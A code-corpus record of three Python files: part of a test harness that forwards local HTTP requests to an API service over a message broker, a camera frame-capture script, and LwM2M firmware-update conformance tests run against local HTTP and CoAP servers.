"apiToken": "SVC:5:RgIo6v:1596670377509:95:vWO1zu8W0a2NyXctWORKMe/kA616P6Vk8dsYvG ... ",
"appId": 95,
"bodyVariable": "request.body",
"command": "RunService",
"expireSeconds": 1596670377,
"headers": [
{
"name": "Accept",
"value": "*/*"
},
{
"name": "User-Agent",
"value": "PostmanRuntime/7.26.2"
},
{
"name": "Content-Type",
"value": "application/json"
}
],
"method": "GET",
"path": "/data",
"queryParams": [
{
"name": "max",
"value": "1000"
}
],
"requestKey": "c29927c8-b94d-4116-a397-e6eb7002f41c"
}
Args:
method: The HTTP method.
Returns:
dict: The response to send to API service over message broker topic.
"""
url_parts = urlparse(self.path)
# query params
params = []
for name, value in parse_qs(url_parts.query).items():
if isinstance(value, list):
for v in value:
params.append({'name': name, 'value': v})
else:
params.append({'name': name, 'value': value})
# forward request to service
request_key = str(uuid4())
content_length = int(self.headers.get('content-length', 0))
if content_length:
body = self.rfile.read(content_length)
self.server.test_case.redis_client.hset(request_key, 'request.body', body)
request_url = self.headers.get('Host', 'http://localhost:8042')
if request_url and not request_url.startswith(('http://', 'https://')):
request_url = f'https://{request_url}'
return {
'apiToken': self.server.test_case.tc_token,
'appId': 95,
'bodyVariable': 'request.body',
'command': 'RunService',
'expireSeconds': int(time.time() + 600),
'headers': [{'name': name, 'value': value} for name, value in self.headers.items()],
'method': method,
'path': url_parts.path,
'queryParams': params,
'requestKey': request_key,
'requestUrl': request_url,
'remoteAddress': '127.0.0.1',
}
def _build_response(self, response: Optional[dict] = None) -> None:
"""Build response data from API service response.
{
"bodyVariable": "response.body",
"command": "Acknowledged",
"headers": [
{
"name": "x-cache",
"value": "MISS"
},
{
"name": "retry-after",
"value": "20"
},
{
"name": "content-type",
"value": "application/json"
},
],
"requestKey": "97190c5a-05e7-493d-8cb5-33844190eb72",
"status": "Too Many Requests",
"statusCode": "429",
"type": "RunService"
}
Args:
response: The response data from API service.
"""
if response is None:
self.send_error(500, message='No response sent on message broker client channel.')
return
# status code
self.send_response(int(response.get('statusCode')))
# headers
for header in response.get('headers'):
self.send_header(header.get('name'), str(header.get('value')))
self.end_headers()
# body
body = self.server.test_case.redis_client.hget(response.get('requestKey'), 'response.body')
if body is not None:
self.wfile.write(body)
def call_service(self, method: str): # pylint: disable=useless-return
"""Call the API Service
Args:
method: The HTTP method.
"""
request = self._build_request(method)
request_key = request.get('requestKey')
# create lock and save request
event = Event()
self.server.active_requests[request_key] = event
# publish run service
self.server.test_case.publish(
message=json.dumps(request), topic=self.server.test_case.server_topic
)
# block for x seconds
event.wait(60)
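# if the service never acknowledged within the 60 second window, the
# response stays None and _build_response() replies with a 500 error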
response: dict = self.server.active_responses.pop(request_key, None)
self._build_response(response=response)
return
def do_DELETE(self):
"""Handle DELETE method."""
return self.call_service('DELETE')
def do_GET(self):
"""Handle GET method."""
return self.call_service('GET')
def do_PATCH(self):
"""Handle PATCH method."""
return self.call_service('PATCH')
def do_POST(self):
"""Handle POST method."""
return self.call_service('POST')
class TestCaseApiService(TestCaseServiceCommon):
"""Service App TestCase Class"""
_test_client = None
api_server = None
api_service_host = os.getenv('API_SERVICE_HOST')
api_service_path = ''
api_service_path_base = '/api/services'
api_service_port = os.getenv('API_SERVICE_PORT')
api_service_protocol = 'https://'
api_service_type = None
stop_server = False
def on_message(self, client, userdata, message): # pylint: disable=unused-argument
"""Handle message broker on_message shutdown command events."""
try:
m = json.loads(message.payload)
except ValueError:
raise RuntimeError(f'Could not parse API service response JSON. ({message})')
# only process RunService Acknowledged commands.
if message.topic == self.server_topic and m.get('command').lower() == 'shutdown':
self.stop_server = True
def run(self):
"""Run the Playbook App.
Returns:
int: The App exit code
"""
if not self.utils.to_bool(os.getenv('API_SERVICE_RUN', 'false')):
return None
# first-party
from run import run # pylint: disable=no-name-in-module
# backup sys.argv
sys_argv_orig = sys.argv
# clear sys.argv
sys.argv = sys.argv[:1]
# run the app
exit_code = 0
try:
# provide callback to run.py method on Trigger Service Apps
run(set_app=self._app_callback) # pylint: disable=unexpected-keyword-arg
except SystemExit as e:
exit_code = e.code
# restore sys.argv
sys.argv = sys_argv_orig
self.log.data('run', 'Exit Code', exit_code)
return exit_code
def setup_method(self):
"""Run before each test method runs."""
if not self.utils.to_bool(os.getenv('API_SERVICE_RUN', 'false')):
super().setup_method()
return
self.api_service_host = 'localhost'
self.api_service_path = ''
self.api_service_path_base = ''
self.api_service_protocol = 'http://'
self.api_service_port = 8042
self.api_server = ApiServer(self, (self.api_service_host, self.api_service_port))
self.api_server.listen()
# subscribe to server topic
self.message_broker.client.subscribe(self.server_topic)
# register on_message shutdown monitor
self.message_broker.add_on_message_callback(
callback=self.on_message, index=0, topics=[self.server_topic]
)
super().setup_method()
def teardown_method(self):
"""Run after each test method runs."""
if not self.utils.to_bool(os.getenv('API_SERVICE_RUN', 'false')):
super().teardown_method()
return
self.api_server.server_close()
super().teardown_method()
@property
def test_client(self):
"""Return test client."""
if not self._test_client:
if not self.api_service_host:
self.tcex.exit(1, 'Required env variable: API_SERVICE_HOST not set.')
base_url = f'{self.api_service_protocol}{self.api_service_host}'
if self.api_service_port:
base_url += f':{int(self.api_service_port)}'
base_url += f'{self.api_service_path_base}{self.api_service_path}'
self._test_client = self.tcex.session
if self.api_service_type.lower() == 'external':
self._test_client = ExternalSession(base_url)
else:
self._test_client.base_url = base_url
return self._test_client
def set_test_client_auth(self, username: str, password: str) -> None:
"""Set basic auth on test_client.
Args:
username: The basic auth username.
password: The basic auth password.
"""
self.test_client.auth = HTTPBasicAuth(username, password)
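# --- Hedged usage sketch (illustration only; names are assumptions) ------
# A concrete test case might exercise the forwarding server roughly like:
#
#     class TestMyApiService(TestCaseApiService):
#         api_service_type = 'external'
#
#         def test_get(self):
#             r = self.test_client.get('/data', params={'max': 1000})
#             assert r.status_code == 200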
|
pyspintest.py | from simple_pyspin import Camera
import time
from PIL import Image
import os
from multiprocessing import Process
def image_capture(duration):
num_frames = int(duration * 50)
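# assumes the camera delivers roughly 50 fps; adjust alongside
# AcquisitionFrameRate below if a different rate is configured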
with Camera() as cam:
# If this is a color camera, request the data in RGB format.
if 'Bayer' in cam.PixelFormat:
cam.PixelFormat = "RGB8"
# Get images from the full sensor
cam.OffsetX = 0
cam.OffsetY = 0
cam.Width = cam.SensorWidth
cam.Height = cam.SensorHeight
# set framerate
# cam.AcquisitionFrameRate = 60
print('Opened camera: %s (#%s)' % (cam.DeviceModelName, cam.DeviceSerialNumber))
print('Recording...')
# Start recording
cam.start()
start = time.time()
print(start)
# Get num_frames images as numpy arrays
imgs = [cam.get_array() for n in range(num_frames)]
# Stop recording
el = time.time() - start
print('el is', el)
cam.stop()
print('Acquired %d images in %.2f s (~ %.1f fps)' % (len(imgs), el, len(imgs) / el))
# Make a directory to save some images
output_dir = 'test_images'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('Saving to "%s"' % output_dir)
# Save them
for n, img in enumerate(imgs):
Image.fromarray(img).save(os.path.join(output_dir, '%08d.jpg' % n))
return start
# image_capture() requires a duration argument, which the original call
# omitted; 2 seconds here is an arbitrary example value
p1 = Process(target=image_capture, args=(2,))
p1.start()
p1.join()
|
firmware_update.py | # -*- coding: utf-8 -*-
#
# Copyright 2017-2021 AVSystem <avsystem@avsystem.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import http
import os
import resource
import socket
import threading
import time
from framework.lwm2m_test import *
from .utils import DataModel, ValueValidator as VV
class FirmwareUpdate:
class Test(DataModel.Test):
def collect_values(self, path: Lwm2mPath, final_value, max_iterations=100, step_time=0.1):
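# Poll ``path`` every ``step_time`` seconds, recording each value read,
# until ``final_value`` is observed or the polling deadline expires.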
observed_values = []
orig_timeout = self.serv.get_timeout()
try:
deadline = time.time() + max_iterations * step_time
while True:
timeout = max(deadline - time.time(), 0.0)
self.serv.set_timeout(timeout)
try:
state = self.test_read(path)
except socket.timeout:
break
observed_values.append(state)
if state == final_value:
break
time.sleep(step_time)
return observed_values
finally:
self.serv.set_timeout(orig_timeout)
def setUp(self, extra_cmdline_args=[]):
self.ANJAY_MARKER_FILE = generate_temp_filename(dir='/tmp', prefix='anjay-fw-updated-')
super().setUp(fw_updated_marker_path=self.ANJAY_MARKER_FILE, extra_cmdline_args=extra_cmdline_args)
def tearDown(self):
# reset the state machine
# Write /5/0/1 (Firmware URI)
req = Lwm2mWrite(ResPath.FirmwareUpdate.PackageURI, '')
self.serv.send(req)
self.assertMsgEqual(Lwm2mChanged.matching(req)(), self.serv.recv())
super().tearDown()
class TestWithCoapServer(Test):
def setUp(self, coap_server=None, extra_cmdline_args=[]):
super().setUp(extra_cmdline_args=extra_cmdline_args)
from framework.coap_file_server import CoapFileServerThread
self.server_thread = CoapFileServerThread(coap_server=coap_server)
self.server_thread.start()
@property
def file_server(self):
return self.server_thread.file_server
def tearDown(self):
try:
super().tearDown()
finally:
self.server_thread.join()
class FirmwareUpdateWithHttpServer:
class Test(FirmwareUpdate.Test):
FIRMWARE_PATH = '/firmware'
HTTP_SERVER_CLASS = http.server.HTTPServer
def get_firmware_uri(self):
return 'http://127.0.0.1:%d%s' % (self.http_server.server_address[1], self.FIRMWARE_PATH)
def before_download(self):
pass
def during_download(self, request_handler):
pass
def setUp(self, firmware_package):
super().setUp()
test_case = self
class FirmwareRequestHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
test_case.requests.append(self.path)
test_case.before_download()
self.send_response(http.HTTPStatus.OK)
self.send_header('Content-type', 'application/octet-stream')
self.send_header('Content-length', len(firmware_package))
self.end_headers()
# give the test some time to read "Downloading" state
time.sleep(1)
test_case.during_download(self)
try:
self.wfile.write(firmware_package)
except BrokenPipeError:
pass
def log_request(self, code='-', size='-'):
# don't display logs on successful request
pass
self.requests = []
self.http_server = self.HTTP_SERVER_CLASS(('', 0), FirmwareRequestHandler)
self.server_thread = threading.Thread(target=lambda: self.http_server.serve_forever())
self.server_thread.start()
def tearDown(self):
try:
super().tearDown()
finally:
self.http_server.shutdown()
self.server_thread.join()
# there should be exactly one request
self.assertEqual([self.FIRMWARE_PATH], self.requests)
class Test751_FirmwareUpdate_QueryingTheReadableResources(FirmwareUpdate.Test):
def runTest(self):
# 1. READ (CoAP GET) operation is performed on the Firmware Update
# Object Instance
#
# A. In test step 1, the Server receives the status code "2.05" for
# READ operation success
# B. In test step 1, the returned values regarding State (ID:3) and
# Update Result (ID:5) prove the Client FW update Capability is in
# initial state (State=Idle & Update Result= Initial Value).
# C. In test step 1, the returned values regarding Firmware Update
# Protocol Support (ID:8) & Firmware Update Delivery Method
# (ID:9) allow to determine the supported characteristics of the
# Client FW Update Capability.
self.test_read('/%d/0' % OID.FirmwareUpdate,
VV.tlv_instance(
resource_validators={
RID.FirmwareUpdate.State: VV.from_raw_int(0),
RID.FirmwareUpdate.UpdateResult: VV.from_raw_int(0),
RID.FirmwareUpdate.FirmwareUpdateProtocolSupport: VV.multiple_resource(VV.from_values(b'\x00', b'\x01', b'\x02', b'\x03', b'\x04', b'\x05')),
RID.FirmwareUpdate.FirmwareUpdateDeliveryMethod: VV.from_raw_int(2),
},
ignore_extra=True))
class Test755_FirmwareUpdate_SettingTheWritableResourcePackage(FirmwareUpdate.Test):
def runTest(self):
# 1. A WRITE (CoAP PUT) operation with a NULL value ('\0') is
# performed by the Server on the Package Resource (ID:0) of the
# FW Update Object Instance
#
# A. In test step 1, the Server receives the success message "2.04"
# associated with the WRITE operation
self.test_write(ResPath.FirmwareUpdate.Package, b'\0',
format=coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 2. The Server READs (CoAP GET) the FW Object Instance to get
# the values of the State (ID:3) and Update Result (ID:5) Resources
#
# B. In test step 2, the Server receives the success message "2.05" along
# with the value of State and Update Result Resources values.
# C. In test step 2, the queried State and Update Result Resources values
# are both 0 (Idle / Initial value): FW Update Object Instance is in the
# Initial state.
self.test_read('/%d/0' % OID.FirmwareUpdate,
VV.tlv_instance(
resource_validators={
RID.FirmwareUpdate.State: VV.from_raw_int(0),
RID.FirmwareUpdate.UpdateResult: VV.from_raw_int(0),
},
ignore_extra=True))
# 3. A WRITE (CoAP PUT) operation with a valid image is
# performed by the Server on the Package Resource (ID:0) of the
# FW Update Object Instance
#
# D. In test step 3, the Server receives the success message "2.04"
# associated with the WRITE request for loading the firmware image.
self.test_write(ResPath.FirmwareUpdate.Package,
make_firmware_package(b''),
format=coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 4. The Server READs (CoAP GET) the FW Object Instance to get
# the values of the State (ID:3) and Update Result (ID:5) Resources
#
# E. In test step 4, the Server receives the success message "2.05" along
# with the State and Update Result Resources values.
# F. In test step 4, the queried value of State resource is 2 (Downloaded)
# and the value of Update Result value is still 0 (Initial Value)
self.test_read('/%d/0' % OID.FirmwareUpdate,
VV.tlv_instance(
resource_validators={
RID.FirmwareUpdate.State: VV.from_raw_int(2),
RID.FirmwareUpdate.UpdateResult: VV.from_raw_int(0),
},
ignore_extra=True))
class Test756_FirmwareUpdate_SettingTheWritableResourcePackageURI(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
super().setUp(make_firmware_package(b''))
def runTest(self):
# 1. A WRITE (CoAP PUT) operation with an empty string value is
# performed by the Server on the Package Resource (ID:0) of the FW
# Update Object Instance
#
# A. In test step 1, the Server receives the success message "2.04"
# associated with the WRITE operation
self.test_write(ResPath.FirmwareUpdate.PackageURI, b'')
# 2. The Server READs (CoAP GET) the FW Object Instance to get the
# values of the State (ID:3) and Update Result (ID:5) Resources
#
# B. In test step 2, the Server receives the success message "2.05" along
# with the value of State and Update Result Resources values.
# C. In test step 2, the queried State and Update Result Resources values
# are both 0 (Idle / Initial value): FW Update Object Instance is in the
# Initial state.
self.test_read('/%d/0' % OID.FirmwareUpdate,
VV.tlv_instance(
resource_validators={
RID.FirmwareUpdate.State: VV.from_raw_int(0),
RID.FirmwareUpdate.UpdateResult: VV.from_raw_int(0),
},
ignore_extra=True))
# 3. A WRITE (CoAP PUT) operation with a valid image is performed by
# the Server on the Package Resource (ID:0) of the FW Update Object
# Instance
#
# D. In test step 3, the Server receives the success message "2.04"
# associated with the WRITE request for the loaded image.
self.test_write(ResPath.FirmwareUpdate.PackageURI,
self.get_firmware_uri())
# give the client some time to download firmware
time.sleep(3)
# 4. The Server READs (CoAP GET) the FW Object Instance to get the
# values of the State (ID:3) and Update Result (ID:5) Resources
#
# E. In test step 4, the Server receives the success message "2.05" along
# with the State and Update Result Resources values.
# F. In test step 4, the queried value of State resource is 2 (Downloaded)
# and the value of Update Result value is still 0 (Initial Value)
self.test_read('/%d/0' % OID.FirmwareUpdate,
VV.tlv_instance(
resource_validators={
RID.FirmwareUpdate.State: VV.from_raw_int(2),
RID.FirmwareUpdate.UpdateResult: VV.from_raw_int(0),
},
ignore_extra=True))
class Test760_FirmwareUpdate_BasicObservationAndNotificationOnFirmwareUpdateObjectResources(FirmwareUpdate.Test):
def runTest(self):
# 1. The Server communicates to the Client pmin=2 and pmax=10
# periods with a WRITE-ATTRIBUTE (CoAP PUT) operation at
# the FW Update Object Instance level.
#
# A. In test step 1, the Server receives the success message "2.04" associated
# with the WRITE-ATTRIBUTE operation.
self.test_write_attributes('/%d/0' % OID.FirmwareUpdate,
pmin=2, pmax=10)
# 2. The Server Sends OBSERVE (CoAP Observe Option) message
# to activate reporting on the State Resource (/5/0/3) of the FW
# Update Object Instance.
#
# B. In test step 2, the Server receives the success message "2.05" associated
# with the OBSERVE operation, along with the value of State =Idle
req = Lwm2mObserve(ResPath.FirmwareUpdate.State)
self.serv.send(req)
res = self.serv.recv()
self.assertMsgEqual(Lwm2mContent.matching(req)(content=b'0'), res)
# 3. The Server delivers the firmware to the Client through a WRITE
# (CoAP PUT) operation on the Package Resource (/5/0/0)
#
# C. In test step 3, the Server receives the success message "2.04" associated
# with the WRITE operation delivering the firmware image.
self.test_write(ResPath.FirmwareUpdate.Package,
make_firmware_package(b''),
format=coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 4. The Client reports requested information with a NOTIFY
# message (CoAP response)
#
# D. In test step 4, the State Resource value returned by the Client in NOTIFY
# message is set to "Downloaded"
req = Lwm2mObserve(ResPath.FirmwareUpdate.State)
self.serv.send(req)
res = self.serv.recv(timeout_s=3)
self.assertMsgEqual(Lwm2mContent.matching(req)(content=b'2'), res)
class Test770_FirmwareUpdate_SuccessfulFirmwareUpdateViaCoAP(FirmwareUpdate.Test):
def runTest(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
payload = f.read()
prev_version = self.test_read(ResPath.Device.FirmwareVersion)
# 1. Step 1 - Package Delivery
# a. The Server places the Client in the initial state of the FW Update
# process: A WRITE (CoAP PUT) operation with a NULL value
# ('\0') is performed by the Server on the Package Resource
# (ID:0) of the FW Update Object Instance
#
# A. Step 1 - Package Delivery
# a. In the test step 1.a, the Server receives the status code "2.04" for
# the WRITE success setting the Client in the FW update initial
# state.
# d. Update Result is "0" (Initial Value) during the whole step
self.test_write(ResPath.FirmwareUpdate.Package, b'\0',
coap.ContentFormat.APPLICATION_OCTET_STREAM)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 1. Step 1 - Package Delivery
# b. The Server delivers the firmware to the Client through a WRITE
# (CoAP PUT) operation on the Package Resource (/5/0/0)
#
# A. Step 1 - Package Delivery
# b. In the test step 1.b, The Server receives success message with
# either a "2.31" status code (Continue) or a final "2.04" status
# code.
self.test_write_block(ResPath.FirmwareUpdate.Package,
make_firmware_package(payload),
coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 1. Step 1 - Package Delivery
# c. Polling (READ command) or Notification on Update Result
# and State Resources is performed, up to the time State Resource
# takes the "Downloaded" value (2)
#
# A. Step 1 - Package Delivery
# c. In the test step 1.c State Resource can take the value "1"
# (Downloading) during this sub-step and will take the value "2" at
# the end (Downloaded)
# d. Update Result is "0" (Initial Value) during the whole step
self.assertEqual(b'2', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 2. Step 2 - Firmware Update
# a. When the download is completed (State Resource value is "2"
# Downloaded), the Server initiates a firmware update by
# triggering EXECUTE command on Update Resource (CoAP
# POST /5/0/2)
#
# B. Step 2 - Firmware Update
# a. In test step 2.a, the Server receives a success message "2.04"
# (Changed) in response to the EXECUTE command
self.test_execute(ResPath.FirmwareUpdate.Update)
# not supported: Updating state only observable via Observe
# self.assertEqual(b'3', self.test_read(ResPath.FirmwareUpdate.State))
# 2. Step 2 - Firmware Update
# b. Polling (READ command) or Notification on Update Result and
# State Resources is performed, up to the time State Resource is
# turned back to Idle value (0) or Update Result Resource contains
# another value than the Initial one (0)
#
# B. Step 2 - Firmware Update
# b. In test step 2.b, the Server receives success message(s) "2.05"
# Contents along with a State Resource value of "3" (Updating)
# or "0" (Idle) and an Update Resource value of "0" (Initial
# Value) or "1" (Firmware updated successfully)
self.serv.reset()
self.assertDemoRegisters()
# 3. Step 3 - Process verification
# a. The Server READs Update Result ("/5/0/5") and State ("/5/0/3")
# Resources to know the result of the firmware update procedure.
#
# C. Step 3 - Process verification
# a. In test step 3.a, the Server receives success message(s) "2.05
# Content" along with a State Resource value of "0" (Idle) and an
# Update Resource value of "1" (Firmware updated successfully)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'1', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 3. Step 3 - Process verification
# b. The Server READs the Resource "Firmware Update" from the
# Object Device Instance ("/3/0/3")
#
# C. Step 3 - Process verification
# b. In test step 3.b, the Server receives success message "2.05"
# Content" along with the expected value of the Resource
# Firmware Version from the Object Device Instance
#
# TODO: we currently update firmware with an identical executable,
# so the version does not change
self.assertEqual(prev_version, self.test_read(ResPath.Device.FirmwareVersion))
class Test771_FirmwareUpdate_SuccessfulFirmwareUpdateViaAlternateMechanism(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
pkg = make_firmware_package(f.read())
super().setUp(pkg)
def runTest(self):
# In this test the package version stays the same after update
prev_version = self.test_read(ResPath.Device.FirmwareVersion)
# 1. Step 1 - Package Delivery
# a. The Server places the Client in the initial state of the FW
# Update process: A WRITE (CoAP PUT) operation with an
# empty string value is performed by the Server on the Package
# URI Resource (ID:1) of the FW Update Object Instance
#
# A. Step 1 - Package Delivery
# a. In the test step 1.a, the Server receives the status code "2.04"
# for the WRITE success setting the Client in the FW update
# initial state.
# e. Update Result is "0" (Initial Value) during the whole test
# step 1
self.test_write(ResPath.FirmwareUpdate.PackageURI, '')
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 1. Step 1 - Package Delivery
# b. The Server delivers the Package URI to the Client through a
# WRITE (CoAP PUT) operation on the Package URI Resource
# (/5/0/1)
#
# A. Step 1 - Package Delivery
# b. In the test step 1.b, the Server receives the status code "2.04"
# for the WRITE success setting the Package URI Client in the
# FW update Object Instance
self.test_write(ResPath.FirmwareUpdate.PackageURI,
self.get_firmware_uri())
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 1. Step 1 - Package Delivery
# c. The Client downloads the firmware from the provided URI via
# an alternative mechanism (not CoAP)
# d. Polling (successive READ commands) or Notification on
# Update Result and State Resources is performed, up to the time
# State Resource takes the "Downloaded" value (2)
#
# A. Step 1 - Package Delivery
# c. In the test step 1.c, The Server receives success message
# with either a "2.31" status code (Continue) or a final "2.04"
# status code.
# d. In the test step 1.d State Resource can take the value "1"
# (Downloading) during this sub-step and will take the value
# "2" at the end (Downloaded)
# e. Update Result is "0" (Initial Value) during the whole test
# step 1
observed_states = self.collect_values(ResPath.FirmwareUpdate.State, b'2')
self.assertEqual(b'2', observed_states[-1])
self.assertIn(set(observed_states), [{b'0', b'1', b'2'}, {b'1', b'2'}])
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 2. Step 2 - Firmware Update
# a. When the download is completed (State Resource value is "2"
# Downloaded), the Server initiates a firmware update by
# triggering EXECUTE command on Update Resource (CoAP
# POST /5/0/2)
#
# B. Step 2 - Firmware Update
# a. In test step 2.a, the Server receives a success message "2.04"
# (Changed) in response to the EXECUTE command
self.test_execute(ResPath.FirmwareUpdate.Update)
# not supported: Updating state only observable via Observe
# self.assertEqual(b'3', self.test_read(ResPath.FirmwareUpdate.State))
# 2. Step 2 - Firmware Update
# b. Polling (READ command) or Notification on Update Result and
# State Resources is performed, up to the time State Resource is
# turned back to Idle value (0) or Update Result Resource contains
# another value than the Initial one (0)
#
# B. Step 2 - Firmware Update
# b. In test step 2.b, the Server receives success message(s) "2.05"
# Contents along with a State Resource value of "3" (Updating)
# or "0" (Idle) and an Update Resource value of "0" (Initial
# Value) or "1" (Firmware updated successfully)
self.serv.reset()
self.assertDemoRegisters()
# 3. Step 3 - Process verification
# a. The Server READs Update Result ("/5/0/5") and State ("/5/0/3")
# Resources to know the result of the firmware update procedure.
#
# C. Step 3 - Process verification
# a. In test step 3.a, the Server receives success message(s) "2.05
# Content" along with a State Resource value of "0" (Idle) and an
# Update Resource value of "1" (Firmware updated successfully)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'1', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 3. Step 3 - Process verification
# b. The Server READs the Resource "Firmware Update" from the
# Object Device Instance ("/3/0/3")
#
# C. Step 3 - Process verification
# b. In test step 3.b, the Server receives success message "2.05"
# Content" along with the expected value of the Resource
# Firmware Version from the Object Device Instance
#
# TODO: we currently update firmware with an identical executable,
# so the version does not change
self.assertEqual(prev_version, self.test_read(ResPath.Device.FirmwareVersion))
class Test772_FirmwareUpdate_ErrorCase_FirmwarePackageNotDownloaded(FirmwareUpdate.Test):
def runTest(self):
# 1. The Server send a READ operation (CoAP GET /5/0) to the Client on the
# FW Update Object Instance to obtain the values of the State and Update
# Resources.
#
# A. In test step 1, the Server receives a success message ("2.05" Content)
# associated to its READ command along with a State Resource value
# which is not "2" (Downloaded) and a valid (0..9) Update Resource
# value
state = self.test_read(ResPath.FirmwareUpdate.State)
self.assertNotEqual(b'2', state)
update_result = self.test_read(ResPath.FirmwareUpdate.UpdateResult)
self.assertIn(int(update_result.decode('ascii')), range(10))
# 2. the Client receives an EXECUTE operation on the Update Resource
# (CoAP POST /5/0/2 ) of the FW Update Object Instance
#
# B. In test step 2, the Server receives the status code "4.05" for method
# not allowed associated to its EXECUTE command
req = Lwm2mExecute(ResPath.FirmwareUpdate.Update)
self.serv.send(req)
res = self.serv.recv()
self.assertMsgEqual(Lwm2mErrorResponse.matching(req)(coap.Code.RES_METHOD_NOT_ALLOWED),
res)
# 3. The Server send a READ operation again (CoAP GET /5/0/3) to the Client
# on the FW Update Object Instance to obtain the State and the Update
# Resource values
#
# C. In test step 3, the Server receives a success message ("2.05" Content)
# associated to its READ command along with a State Resource value
# and an Update Result Resource value, identical to the ones retrieved
# in Pass-Criteria A. The firmware has not been installed.
self.assertEqual(state, self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(update_result, self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test773_FirmwareUpdate_ErrorCase_NotEnoughStorage_FirmwareURI(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
@contextlib.contextmanager
def temporary_soft_fsize_limit(limit_bytes):
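# Lower only the soft RLIMIT_FSIZE so the spawned client inherits it;
# the hard limit (prev_limit[1]) is kept so the original value can be
# restored in the finally block.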
prev_limit = resource.getrlimit(resource.RLIMIT_FSIZE)
try:
resource.setrlimit(resource.RLIMIT_FSIZE, (limit_bytes, prev_limit[1]))
yield
finally:
resource.setrlimit(resource.RLIMIT_FSIZE, prev_limit)
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
payload = f.read()
# Limit file size for demo so that full firmware is too much.
# After demo starts, we can safely restore original limit, as
# the client already inherited smaller one.
with temporary_soft_fsize_limit(len(payload) // 2):
super().setUp(payload)
def runTest(self):
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in
# Idle State
#
# A. In test step 1, the Server receives the status code "2.05 " (Content) for
# the READ success command, along with the State Resource value of
# "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client either
# through a WRITE (CoAP PUT) operation in the Package
# Resource (/5/0/0) or through a WRITE operation of an URI in the
# Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting either the Package URI Resource or
# setting the Package Resource, according to the chosen firmware
# delivery method.
self.test_write(ResPath.FirmwareUpdate.PackageURI,
self.get_firmware_uri())
# 3. The firmware downloading process is running. The Server sends
# repeated READs or OBSERVE on State and Update Result
# Resources (CoAP GET /5/0) of the FW Update Object Instance
# to determine when the download is completed or if an error
# occurred. Before the end of download, the device runs out of
# storage and cannot finish the download
# 4. When the Package delivery is stopped the server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource retrieved with a value of "1" from
# successive Server READs or Client NOTIFY messages, indicates the
# download stage of the Package Delivery is engaged
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "2" indicating an error occurred during the downloading
# process related to shortage of storage memory. The State Resource
# value never reaches the Downloaded value ("2")
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "2" indicates the firmware Package Delivery
# aborted due to shortage of storage.
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0')
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'2', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test773_FirmwareUpdate_ErrorCase_NotEnoughStorage_FirmwareURI_CoAP(FirmwareUpdate.TestWithCoapServer):
def setUp(self):
# limit file size to 100K; enough for persistence file, not
# enough for firmware
import resource
self.prev_limit = resource.getrlimit(resource.RLIMIT_FSIZE)
new_limit_b = 100 * 1024
resource.setrlimit(resource.RLIMIT_FSIZE, (new_limit_b, self.prev_limit[1]))
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
self._payload = f.read()
super().setUp()
def tearDown(self):
import resource
resource.setrlimit(resource.RLIMIT_FSIZE, self.prev_limit)
super().tearDown()
def runTest(self):
with self.file_server as file_server:
file_server.set_resource('/firmware', self._payload)
uri = file_server.get_resource_uri('/firmware')
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in
# Idle State
#
# A. In test step 1, the Server receives the status code "2.05 " (Content) for
# the READ success command, along with the State Resource value of
# "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client either
# through a WRITE (CoAP PUT) operation in the Package
# Resource (/5/0/0) or through a WRITE operation of an URI in the
# Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting either the Package URI Resource or
# setting the Package Resource, according to the chosen firmware
# delivery method.
self.test_write(ResPath.FirmwareUpdate.PackageURI, uri)
